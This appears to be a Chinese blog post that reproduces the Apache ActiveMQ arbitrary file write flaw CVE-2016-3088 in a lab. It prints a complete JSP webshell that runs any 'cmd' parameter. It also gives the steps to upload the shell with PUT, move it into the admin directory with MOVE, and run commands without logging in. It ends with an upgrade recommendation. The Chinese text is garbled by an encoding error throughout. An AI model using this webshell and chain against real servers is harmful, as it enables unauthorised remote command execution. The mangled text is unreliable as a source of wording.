溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn)

發(fā)布時(shí)間:2020-09-18 02:56:38 來(lái)源:腳本之家 閱讀:1197 作者:雨中落葉 欄目:服務(wù)器

一、漏洞描述

該漏洞出現(xiàn)在fileserver應(yīng)用中,漏洞原理:ActiveMQ中的fileserver服務(wù)允許用戶通過(guò)HTTP PUT方法上傳文件到指定目錄。Fileserver支持寫(xiě)入文件(不解析jsp),但是支持移動(dòng)文件(Move)我們可以將jsp的文件PUT到Fileserver下,然后再通過(guò)Move指令移動(dòng)到可執(zhí)行目錄下訪問(wèn)。

二、漏洞影響版本

Apache ActiveMQ 5.0.0 - 5.13.2

三、漏洞環(huán)境搭建

1、官網(wǎng)下載apache-activemq-5.7.0-bin.tar 下載地址:http://activemq.apache.org/download-archives.html

2、解壓

3、啟動(dòng),進(jìn)入bin目錄下,運(yùn)行./activemq start

  Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn)

4、瀏覽器訪問(wèn)http://192.168.10.149:8161/,如下圖可以看到成功搭建環(huán)境

  Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn)

四、漏洞復(fù)現(xiàn)

1、PUT上傳一個(gè)jsp的webshell到fileserver目錄,下圖可以看到成功上傳jsp文件

Jsp文件內(nèi)容:

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

  Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn)

2、瀏覽器訪問(wèn)http://192.168.10.149:8161/fileserver/1.jsp,下圖可以看到fileserver目錄下的webshell沒(méi)有被解析,說(shuō)明fileserver目錄沒(méi)有執(zhí)行權(quán)限

  Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn)

3、利用該版本存在物理路徑泄露漏洞,爆一下絕對(duì)路徑

  Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn)

4、利用Move方法將webshell移入admin目錄下,如下圖所示成功把文件移入到admin目錄

  Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn)

5、利用該版本存在的未授權(quán)訪問(wèn)漏洞,不用登錄,訪問(wèn)http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖可以看到成功執(zhí)行命令

  Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn)

五、漏洞防御

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級(jí)至 5.14.0 及其以后版本。

---------------------------------------------------------------------------------

參考: https://www.secpulse.com/archives/60064.html

總結(jié)

以上所述是小編給大家介紹的Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn),希望對(duì)大家有所幫助,如果大家有任何疑問(wèn)請(qǐng)給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)億速云網(wǎng)站的支持!
如果你覺(jué)得本文對(duì)你有幫助,歡迎轉(zhuǎn)載,煩請(qǐng)注明出處,謝謝!

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI